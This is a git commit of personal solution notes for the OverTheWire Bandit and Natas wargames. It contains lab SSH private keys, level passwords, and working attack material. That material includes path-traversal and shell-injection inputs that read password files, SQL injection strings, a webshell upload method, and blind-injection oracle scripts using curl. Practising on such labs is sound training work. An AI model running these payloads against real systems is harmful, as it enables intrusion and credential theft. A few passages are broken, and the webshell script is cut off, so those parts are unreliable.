commit 500329a86b6de2cfb10014c21b12519b0478dc23
Author: Emile Clark-Boman
Date: Tue Jul 15 22:44:06 2025 +1000
OverTheWire
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..e92f831
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,3 @@
+/*
+!.gitignore
+!overthewire/
diff --git a/overthewire/bandit/keys/id_bandit14 b/overthewire/bandit/keys/id_bandit14
new file mode 100644
index 0000000..3a9f6d0
--- /dev/null
+++ b/overthewire/bandit/keys/id_bandit14
@@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEAxkkOE83W2cOT7IWhFc9aPaaQmQDdgzuXCv+ppZHa++buSkN+ +gg0tcr7Fw8NLGa5+Uzec2rEg0WmeevB13AIoYp0MZyETq46t+jk9puNwZwIt9XgB +ZufGtZEwWbFWw/vVLNwOXBe4UWStGRWzgPpEeSv5Tb1VjLZIBdGphTIK22Amz6Zb +ThMsiMnyJafEwJ/T8PQO3myS91vUHEuoOMAzoUID4kN0MEZ3+XahyK0HJVq68KsV +ObefXG1vvA3GAJ29kxJaqvRfgYnqZryWN7w3CHjNU4c/2Jkp+n8L0SnxaNA+WYA7 +jiPyTF0is8uzMlYQ4l1Lzh/8/MpvhCQF8r22dwIDAQABAoIBAQC6dWBjhyEOzjeA +J3j/RWmap9M5zfJ/wb2bfidNpwbB8rsJ4sZIDZQ7XuIh4LfygoAQSS+bBw3RXvzE +pvJt3SmU8hIDuLsCjL1VnBY5pY7Bju8g8aR/3FyjyNAqx/TLfzlLYfOu7i9Jet67 +xAh0tONG/u8FB5I3LAI2Vp6OviwvdWeC4nOxCthldpuPKNLA8rmMMVRTKQ+7T2VS +nXmwYckKUcUgzoVSpiNZaS0zUDypdpy2+tRH3MQa5kqN1YKjvF8RC47woOYCktsD +o3FFpGNFec9Taa3Msy+DfQQhHKZFKIL3bJDONtmrVvtYK40/yeU4aZ/HA2DQzwhe +ol1AfiEhAoGBAOnVjosBkm7sblK+n4IEwPxs8sOmhPnTDUy5WGrpSCrXOmsVIBUf +laL3ZGLx3xCIwtCnEucB9DvN2HZkupc/h6hTKUYLqXuyLD8njTrbRhLgbC9QrKrS +M1F2fSTxVqPtZDlDMwjNR04xHA/fKh8bXXyTMqOHNJTHHNhbh3McdURjAoGBANkU +1hqfnw7+aXncJ9bjysr1ZWbqOE5Nd8AFgfwaKuGTTVX2NsUQnCMWdOp+wFak40JH +PKWkJNdBG+ex0H9JNQsTK3X5PBMAS8AfX0GrKeuwKWA6erytVTqjOfLYcdp5+z9s +8DtVCxDuVsM+i4X8UqIGOlvGbtKEVokHPFXP1q/dAoGAcHg5YX7WEehCgCYTzpO+ +xysX8ScM2qS6xuZ3MqUWAxUWkh7NGZvhe0sGy9iOdANzwKw7mUUFViaCMR/t54W1 +GC83sOs3D7n5Mj8x3NdO8xFit7dT9a245TvaoYQ7KgmqpSg/ScKCw4c3eiLava+J +3btnJeSIU+8ZXq9XjPRpKwUCgYA7z6LiOQKxNeXH3qHXcnHok855maUj5fJNpPbY +iDkyZ8ySF8GlcFsky8Yw6fWCqfG3zDrohJ5l9JmEsBh7SadkwsZhvecQcS9t4vby +9/8X4jS0P8ibfcKS4nBP+dT81kkkg5Z5MohXBORA7VWx+ACohcDEkprsQ+w32xeD +qT1EvQKBgQDKm8ws2ByvSUVs9GjTilCajFqLJ0eVYzRPaY6f++Gv/UVfAPV4c+S0 +kAWpXbv5tbkkzbS0eaLPTKgLzavXtQoTtKwrjpolHKIHUz6Wu+n4abfAIRFubOdN +/+aLoRQ0yBDRbdXMsZN/jvY44eM+xRLdRVyMmdPtP8belRi2E2aEzA== +-----END RSA PRIVATE KEY----- diff --git a/overthewire/bandit/keys/id_bandit14.pub b/overthewire/bandit/keys/id_bandit14.pub new file mode 100644 index 0000000..85009e7 --- /dev/null +++ b/overthewire/bandit/keys/id_bandit14.pub 
@@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGSQ4TzdbZw5PshaEVz1o9ppCZAN2DO5cK/6mlkdr75u5KQ36CDS1yvsXDw0sZrn5TN5zasSDRaZ568HXcAihinQxnIROrjq36OT2m43BnAi31eAFm58a1kTBZsVbD+9Us3A5cF7hRZK0ZFbOA+kR5K/lNvVWMtkgF0amFMgrbYCbPpltOEyyIyfIlp8TAn9Pw9A7ebJL3W9QcS6g4wDOhQgPiQ3QwRnf5dqHIrQclWrrwqxU5t59cbW+8DcYAnb2TElqq9F+BiepmvJY3vDcIeM1Thz/YmSn6fwvRKfFo0D5ZgDuOI/JMXSKzy7MyVhDiXUvOH/z8ym+EJAXyvbZ3 diff --git a/overthewire/bandit/keys/id_bandit17 b/overthewire/bandit/keys/id_bandit17 new file mode 100644 index 0000000..20f4684 --- /dev/null +++ b/overthewire/bandit/keys/id_bandit17 
@@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ +imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ +Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu +DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW +JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX +x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD +KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl +J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd +d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC +YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A +vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama ++TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT +8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx +SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd +HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt +SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A +R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi +Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg +R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu +L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni +blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU +YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM +77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b +dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3 +vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY= +-----END RSA PRIVATE KEY----- diff --git a/overthewire/bandit/keys/id_bandit17.pub b/overthewire/bandit/keys/id_bandit17.pub new file mode 100644 index 0000000..e69de29 diff --git a/overthewire/bandit/keys/id_bandit26 b/overthewire/bandit/keys/id_bandit26 new file mode 100644 index 0000000..f3f2dee 
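Review bot: `overthewire/bandit/keys/id_bandit17.pub` is committed as an empty file — its index line is `0000000..e69de29`, the hash of git's empty blob, and it has no hunk body — while `id_bandit14.pub` and `id_bandit26.pub` each carry a full `ssh-rsa` line. The public half can be regenerated from the private key with `ssh-keygen -y -f id_bandit17 > id_bandit17.pub`, or the empty file dropped if nothing reads it. Note that the `.gitignore` allowlist added in this commit (`/*`, `!.gitignore`, `!overthewire/`) tracks the whole `overthewire/` tree, so these plaintext `BEGIN RSA PRIVATE KEY` blocks are versioned by design; any secret scanner run over the repository will flag all three of them, so a short README line stating that they are throwaway wargame keys would save future triage.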
--- /dev/null +++ b/overthewire/bandit/keys/id_bandit26 @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEpQIBAAKCAQEApis2AuoooEqeYWamtwX2k5z9uU1Afl2F8VyXQqbv/LTrIwdW +pTfaeRHXzr0Y0a5Oe3GB/+W2+PReif+bPZlzTY1XFwpk+DiHk1kmL0moEW8HJuT9 +/5XbnpjSzn0eEAfFax2OcopjrzVqdBJQerkj0puv3UXY07AskgkyD5XepwGAlJOG +xZsMq1oZqQ0W29aBtfykuGie2bxroRjuAPrYM4o3MMmtlNE5fC4G9Ihq0eq73MDi +1ze6d2jIGce873qxn308BA2qhRPJNEbnPev5gI+5tU+UxebW8KLbk0EhoXB953Ix +3lgOIrT9Y6skRjsMSFmC6WN/O7ovu8QzGqxdywIDAQABAoIBAAaXoETtVT9GtpHW +qLaKHgYtLEO1tOFOhInWyolyZgL4inuRRva3CIvVEWK6TcnDyIlNL4MfcerehwGi +il4fQFvLR7E6UFcopvhJiSJHIcvPQ9FfNFR3dYcNOQ/IFvE73bEqMwSISPwiel6w +e1DjF3C7jHaS1s9PJfWFN982aublL/yLbJP+ou3ifdljS7QzjWZA8NRiMwmBGPIh +Yq8weR3jIVQl3ndEYxO7Cr/wXXebZwlP6CPZb67rBy0jg+366mxQbDZIwZYEaUME +zY5izFclr/kKj4s7NTRkC76Yx+rTNP5+BX+JT+rgz5aoQq8ghMw43NYwxjXym/MX +c8X8g0ECgYEA1crBUAR1gSkM+5mGjjoFLJKrFP+IhUHFh25qGI4Dcxxh1f3M53le +wF1rkp5SJnHRFm9IW3gM1JoF0PQxI5aXHRGHphwPeKnsQ/xQBRWCeYpqTme9amJV +tD3aDHkpIhYxkNxqol5gDCAt6tdFSxqPaNfdfsfaAOXiKGrQESUjIBcCgYEAxvmI +2ROJsBXaiM4Iyg9hUpjZIn8TW2UlH76pojFG6/KBd1NcnW3fu0ZUU790wAu7QbbU +i7pieeqCqSYcZsmkhnOvbdx54A6NNCR2btc+si6pDOe1jdsGdXISDRHFb9QxjZCj +6xzWMNvb5n1yUb9w9nfN1PZzATfUsOV+Fy8CbG0CgYEAifkTLwfhqZyLk2huTSWm +pzB0ltWfDpj22MNqVzR3h3d+sHLeJVjPzIe9396rF8KGdNsWsGlWpnJMZKDjgZsz +JQBmMc6UMYRARVP1dIKANN4eY0FSHfEebHcqXLho0mXOUTXe37DWfZza5V9Oify3 +JquBd8uUptW1Ue41H4t/ErsCgYEArc5FYtF1QXIlfcDz3oUGz16itUZpgzlb71nd +1cbTm8EupCwWR5I1j+IEQU+JTUQyI1nwWcnKwZI+5kBbKNJUu/mLsRyY/UXYxEZh +ibrNklm94373kV1US/0DlZUDcQba7jz9Yp/C3dT/RlwoIw5mP3UxQCizFspNKOSe +euPeaxUCgYEAntklXwBbokgdDup/u/3ms5Lb/bm22zDOCg2HrlWQCqKEkWkAO6R5 +/Wwyqhp/wTl8VXjxWo+W+DmewGdPHGQQ5fFdqgpuQpGUq24YZS8m66v5ANBwd76t +IZdtF5HXs2S5CADTwniUS5mX1HO9l5gUkk+h0cH5JnPtsMCnAUM+BRY= +-----END RSA PRIVATE KEY----- diff --git a/overthewire/bandit/keys/id_bandit26.pub b/overthewire/bandit/keys/id_bandit26.pub new file mode 100644 index 0000000..a793c29 --- /dev/null +++ b/overthewire/bandit/keys/id_bandit26.pub 
@@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmKzYC6iigSp5hZqa3BfaTnP25TUB+XYXxXJdCpu/8tOsjB1alN9p5EdfOvRjRrk57cYH/5bb49F6J/5s9mXNNjVcXCmT4OIeTWSYvSagRbwcm5P3/lduemNLOfR4QB8VrHY5yimOvNWp0ElB6uSPSm6/dRdjTsCySCTIPld6nAYCUk4bFmwyrWhmpDRbb1oG1/KS4aJ7ZvGuhGO4A+tgzijcwya2U0Tl8Lgb0iGrR6rvcwOLXN7p3aMgZx7zverGffTwEDaqFE8k0Ruc96/mAj7m1T5TF5tbwotuTQSGhcH3ncjHeWA4itP1jqyRGOwxIWYLpY387ui+7xDMarF3L diff --git a/overthewire/bandit/passwords.md b/overthewire/bandit/passwords.md new file mode 100644 index 0000000..4f267a0 --- /dev/null +++ b/overthewire/bandit/passwords.md 
@@ -0,0 +1,159 @@ +bandit0: bandit0 +bandit1: ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If + `cat readme` +bandit2: 263JGJPfgU6LtdEvgfWU1XP5yac29mFx + `cat ./-` +bandit3: MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx +bandit4: 2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ +bandit5: 4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw +bandit6: HWasnPhtq9AVKe0dmk45nxy20cvUa6EG + `find inhere/ -type f -print 2>/dev/null | xargs -d '\n' ls -l | grep 1033` +bandit7: morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj + `cat $(find / -type f -user bandit7 -group bandit6 2>/dev/null)` +bandit8: dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc + ` "$KEY.pub" + chmod 600 $KEY* + # login with private key + ssh bandit14@bandit.labs.overthewire.org -p 2220 -i ./id_bandit14 + # >>> echo /etc/bandit_pass/bandit14 + ``` +bandit15: 8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo + `echo "MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS" | nc localhost 30000` +bandit16: kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx + `openssl s_client -connect localhost:30001` +bandit17: STORED IN `keys/id_bandit17*` + ```bash + # get all open ports + nmap localhost -T5 -p31000-32000 + | grep open + | awk '{print substr($1, 1, 5)}' + ``` +bandit18: x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO + `diff passwords.old passwords.new` +bandit19: cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8 + `ssh bandit19@bandit.labs.overthewire.org -p 2220 -t /bin/sh` +bandit20: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO + `./bandit20-do cat /etc/bandit_pass/bandit20` +bandit21: EeoULMCra2q0dSkYj561DX7s1CpBuOBt + ``` + tmux new -s imbaud + # Ctrl-b + " + BOX=$(mktemp) && echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO" > $BOX && <$BOX nc -l -p 5555 + # Ctrl-b + o + ~/suconnect 5555 + ``` +bandit22: tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q + `/etc/cron.d/cronjob_bandit22` references binary `/usr/bin/cronjob_bandit22.sh` + which complains about bad privileges for `/tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv` + then cat out the temp file and BOOM +bandit23: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga + Similar solution to previous one with `/etc/cron.d/cronjob_bandit23` + `cat /tmp/$(echo I am user bandit23 | md5sum | cut 
-d ' ' -f 1)` +bandit24: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 + ```bash + # terminal 1: + nc -l -p 5555 + # terminal 2: + echo -e "#\!/bin/bash\ncat /etc/bandit_pass/bandit24 + | nc localhost 5555" > /var/spool/bandit24/foo/gibme + ``` +bandit25: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4 + '''bash + python3 -c "from itertools import product; [print(''.join(D)) for D in product((str(x) for x in range(10)), repeat=4)]" + | xargs -L1 echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8" + | nc localhost 30002 + | grep -v "Wrong" + ''' +bandit26: s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ + First copy the private key from bandit25's home + Then `cat /etc/passwd | grep bandit26` to find what shell bandit26 uses: + # bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext + `cat /usr/bin/showtext` to see it runs the `more` pager then exits. + `more` will enter "command" mode if the terminal window is too small + to view the paged contents, which allows us to run the `v` command + which opens the content in vim instead. 
Next, do `:set shell=/bin/bash` + and then run vim's `:shell` to GTFO + +bandit27: upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB + From bandit26 in bash: `./bandit27-do cat /etc/bandit_pass/bandit27` +bandit28: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN + ```bash + BOX=$(mktemp -d); echo $BOX + git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo $BOX + # use same password as bandit27 login + cd $BOX + # then check README + ``` +bandit29: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7 + Do same as bandit28 for `/home/bandit28-git/repo`, then: + `git show fb0df1358b1ff146f581651a84bae622353a71c0:README.md` +bandit30: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL + Do what bandit29 did but then: + ```bash + git branch -r # list all remote branches + git fetch --all + ``` +bandit31: fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy + Similar to bandit30 but use: + ```bash + git tag + git show secret # show the "secret" tag + ``` +bandit32: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K + Simply `rm .gitignore` then `git add .; git commit -m "AHHHHH"; git push -u origin` +bandit33: tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0 + ```bash + # use symbols since uppercase messes everything up + $0 # the shell runs "sh " so "sh $0" => "sh sh" + cat /etc/bandit_pass/bandit33 + ``` + +``` +>>> bandit33@bandit:~/README.md <<< +Congratulations on solving the last level of this game! + +At this moment, there are no more levels to play in this game. However, we are constantly working +on new levels and will most likely expand this game with more levels soon. +Keep an eye out for an announcement on our usual communication channels! +In the meantime, you could play some of our other wargames. + +If you have an idea for an awesome new level, please let us know! 
+``` + +Learnings: +``` +Connect over SSL/TLS (like telnet/nc does) using openssl: + `openssl s_client -connect HOST:PORT -quiet` + Note: commands starting with "k" will trigger "KEYUPDATE" + run openssl with the `-quiet` flag to avoid this + https://docs.openssl.org/3.0/man1/openssl-s_client/#connected-commands + +The pager "more" goes into a command mode if the terminal is too small to display +the content. Which allows us to run any command we want. + +Git: + git show :file/path/here # print a file content at specific hash + git branch -r # list all branches stored on the remote +``` diff --git a/overthewire/natas/passwords.md b/overthewire/natas/passwords.md new file mode 100644 index 0000000..b6a8f71 --- /dev/null +++ b/overthewire/natas/passwords.md 
@@ -0,0 +1,282 @@ +natas0: natas0 +natas1: 0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq + View source +natas2: TguMNxKo1DSa1tujBLuZJnDUlCcUAPlI + View source + enable absolute mode (browser extension) +natas3: 3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH + There's a tracking pixel `` so checking + out the `files/` directory we find `files/users.txt` + +natas4: QryZXc2e0zahULdHrtHxzyYkj59kUxLQ + Check `robots.txt` +natas5: 0n35PkggAPm2zbEpOU802c0x0Msn1ToK + Forge the HTTP "Referer" header + ```bash + http -F \ # follow redirects + -a natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ \ # auth + http://natas4.natas.labs.overthewire.org/index.php \ # host + "Referer: http://natas5.natas.labs.overthewire.org/" # forgery + ``` +natas6: 0RoJwHdSKWFTYR5WuiAewauSuNaBXned + Forge your cookie to be "loggedIn: 1" +natas7: bmg8SvU1LizuWjx3y7xkNERkHxGre0GS + The source references "includes/secret.inc", navigate here + then put the secret into the search widget. +natas8: xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q + Exploit how `index.php` selects the page to load + http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8 +natas9: ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t + Find the encoded secret in the source code, decode in python via: + `base64.b64decode(bytes.fromhex(encoded)[::-1]).decode()` +natas10: t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu + Bash injection with the following input + `a b &>/dev/null | cat /etc/natas_webpass/natas10 #` +natas11: UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk + Another bash injection + `. /etc/natas_webpass/natas11 #` +natas12: yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB + Exploit that the cookie is in a known format, simply xor + with a known plaintext and see what key repeats. Then use + that key to forge a new cookie with `"showpassword":"yes"`. 
+ NOTE: see [[#Natas11 Solution Script|Appendix/"Natas11 Solution Script"]] +natas13: trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC + Exploit the fact that the upload path is stored in a hidden field of the form, + use Inspect Element to modify this upload path to be `.php` not `.jpg`. Upload + a php webshell (payload and methodology can vary though). Then navigate there. + Via the webshell `cat /etc/natas_webpass/natas13` + NOTE: see [[#Natas12 Solution Script|Appendix/"Natas12 Solution Script"]] +natas14: z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ + Exploit MIME type detection and size limit by generating a tiny 1x1 jpg + and adding a php script to the end. I used the same webshell as I did for natas13. + Then use `cat image.jpg webshell.php > payload.php`. This will be detected + as a jpg and will be viewable as a jpg, modify the hidden form field again + (same as for natas13) and change file path to `.php`. + NOTE: image generation via `magick -size 1x1 pattern:checkerboard image.jpg` +natas15: SdqIqBsFcz3yotlNYErZSZwblkm0lrvx + Exploit SQL injection for the query: +```sql +SELECT * from users where username="{username}" and password="{password}" +``` + Injection Parameters: username:`" or 1=1--`, password:`" --` +natas16: hPkjKYviLQctEW33QmuXL6eDVfMW4sGo + Use the website as an oracle under an SQL injection. + NOTE: see [[#Natas15 Solution Script|Appendix/"Natas15 Solution Script"]] +natas17: EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC + Another oracle attack using an SQL injection. Specifically guess the + password character by character using `grep` to return NOTHING on failure + and the entire password on match ` echo "\$(grep ^.* /etc/natas_webpass/natas17)"` + which will either dump the entire dictionary or nothing (respectively). + NOTE: see [[#Natas16 Solution Script|Appendix/"Natas16 Solution Script"]] +natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ + Another oracle attack using an SQL injection AND this time + using a timing based attack. 
+ NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]] + +natas19: +natas20: + + + + +### Learnings +SQL Comments for injections + An appended space character is sometimes required ie `-- ` not `--`. + +### Appendix: +###### Natas11 Solution Script +```python +import base64 as b64 + +PLAINTEXT = '''{"showpassword":"no","bgcolor":"#ffffff"}''' +COOKIE = 'HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg=' +FORGED_PLAINTEXT = '''{"showpassword":"yes","bgcolor":"#ffffff"}''' + + + +def xorbytes(x: bytes, y: bytes) -> bytes: + Lx, Ly = len(x), len(y) + if Lx < Ly: return xorbytes(y, x) + + return bytes(x[i]^y[i%Ly] for i in range(Lx)) + +def extract_key(k: bytes) -> tuple[bytes, int] | None: + Lk = len(k) + substr = b'' + length = 0 + for i in range(Lk): + substr += k[i:i+1] + length += 1 + if k == substr*(Lk//length) + substr[:Lk%length]: + return substr, length + return None + + +def main() -> None: + plaintext = PLAINTEXT.encode() + cookie = b64.b64decode(COOKIE) + decoded = xorbytes(cookie, plaintext) + print('Modulated Key:', ''.join(chr(x) for x in decoded)) + key, key_size = extract_key(decoded) + + forged_cookie = b64.b64encode(xorbytes(FORGED_PLAINTEXT.encode(), key)) + print('Forged:', forged_cookie) + + +if __name__ == '__main__': + try: + main() + except (KeyboardInterrupt, EOFError): + print('\n[!] Interrupt') +``` + +###### Natas12 Solution Script +```php + + +
+ + +
+
+&1');
+    }
+?>
+
+ + +``` + + +###### Natas15 Solution Script +```bash +#!/usr/bin/env bash + +req() { + curl http://natas15.natas.labs.overthewire.org/index.php \ + -X POST \ + -u natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx \ + -d "username=natas16\" and $1 -- " \ + -sS \ + | grep exists &>/dev/null +} + +# ie `guess_length "=32"` or `guess_length ">32"` +guess_length() { + req "length(password)$1" +} + +get_length() { + echo "[*] Guessing length" + local MIN=${1:-1} + local MAX=${2:-100} + # local PADMAX=${#MAX} + local FGUESS="%${#MAX}s - %-${#MAX}s" + while true; do + printf "[-] Guess: $FGUESS\r" $MIN $MAX + if [ $((MAX-MIN)) -eq 1 ]; then + break + fi; + + local MID=$(( (MAX+MIN)/2 )) + guess_length ">$MID" && MIN=$MID || MAX=$MID + done + printf "[+] Found: $FGUESS\n" $MIN $MAX + return $MAX +} + +LOWER="abcdefghijklmnopqrstuvwxyz" +UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ" +DIGIT="0123456789" + +guess_regex() { + req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')" +} + +exploit_oracle() { + echo "[@] Forcing oracle exploit" + local PREFIX="" + local LENGTH=$1 + + while true; do + if [ "${#PREFIX}" = "$LENGTH" ]; then + break + fi + + for chars in $LOWER $UPPER $DIGIT; do + local MIN=1 + local MAX=${#chars} + + local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]" + echo -en "[*] ?? $RANGE\r" + guess_regex "$PREFIX$RANGE$POSTFIX" || continue + echo "[+] Found[CHARSET]: $chars" + + local MID=$(( (MAX+MIN)/2 )) + while true; do + echo -en "[*] Guess: $RANGE\r" + if [ $((MAX-MIN)) -eq 1 ]; then + if guess_regex "$PREFIX${chars:MIN-1:1}"; then + PREFIX="${PREFIX}${chars:MIN-1:1}" + else + PREFIX="${PREFIX}${chars:MAX-1:1}" + fi + echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX" + break + fi; + + MID=$(( (MAX+MIN)/2 )) + RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]" + guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID + done + break + done + done + printf "[+] Found: $FGUESS\n" $MIN $MAX +} + +get_length +LENGTH=$? 
+exploit_oracle "$LENGTH" +``` + +###### Natas16 Solution Script +```sh +#!/usr/bin/env bash + +fcmd() { + # echo '$(grep ^$1[a-zA-Z0-9]*$ /etc/natas_webpass/natas17)' + echo "\$(grep ^$1.* /etc/natas_webpass/natas17)" +} + +req() { + curl http://natas16.natas.labs.overthewire.org/index.php \ + -X POST \ + -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \ + -d "needle=$1" \ + -sS \ + | grep --after-context 2 "
" \
+    | tail -n1 \
+    | grep "African" &>/dev/null
+}
+
+CHARSET="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
+KNOWN=""
+GUESS=""
+for ((i=0 ; i < 32 ; i++)); do
+  for ((j=0; j<${#CHARSET}; j++)); do
+    c=${CHARSET:j:1}
+    GUESS="$KNOWN$c"
+    echo -en "[*] Guess: $GUESS                                  \r"
+    # echo $(fcmd $guess)
+    req "$(fcmd $GUESS)" || break # && KNOWN=$guess # && break
+  done
+  KNOWN=$GUESS
+  echo -en "[+] Known: $KNOWN\n                                    "
+done
+echo
+```
+
+
diff --git a/overthewire/natas/scripts/natas11.py b/overthewire/natas/scripts/natas11.py
new file mode 100644
index 0000000..ac778d6
--- /dev/null
+++ b/overthewire/natas/scripts/natas11.py
@@ -0,0 +1,42 @@
+import base64 as b64
+
+PLAINTEXT = '''{"showpassword":"no","bgcolor":"#ffffff"}'''
+COOKIE = 'HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg='
+FORGED_PLAINTEXT = '''{"showpassword":"yes","bgcolor":"#ffffff"}'''
+
+
+
+def xorbytes(x: bytes, y: bytes) -> bytes:
+    Lx, Ly = len(x), len(y)
+    if Lx < Ly: return xorbytes(y, x)
+    
+    return bytes(x[i]^y[i%Ly] for i in range(Lx))
+        
+def extract_key(k: bytes) -> tuple[bytes, int] | None:
+    Lk = len(k)
+    substr = b''
+    length = 0
+    for i in range(Lk):
+        substr += k[i:i+1]
+        length += 1 
+        if k == substr*(Lk//length) + substr[:Lk%length]:
+            return substr, length
+    return None
+
+
+def main() -> None:
+    plaintext = PLAINTEXT.encode()
+    cookie    = b64.b64decode(COOKIE)
+    decoded   = xorbytes(cookie, plaintext)
+    print('Modulated Key:', ''.join(chr(x) for x in decoded))
+    key, key_size = extract_key(decoded)
+
+    forged_cookie = b64.b64encode(xorbytes(FORGED_PLAINTEXT.encode(), key))
+    print('Forged:', forged_cookie)
+    
+
+if __name__ == '__main__':
+    try:
+        main()
+    except (KeyboardInterrupt, EOFError):
+        print('\n[!] Interrupt')
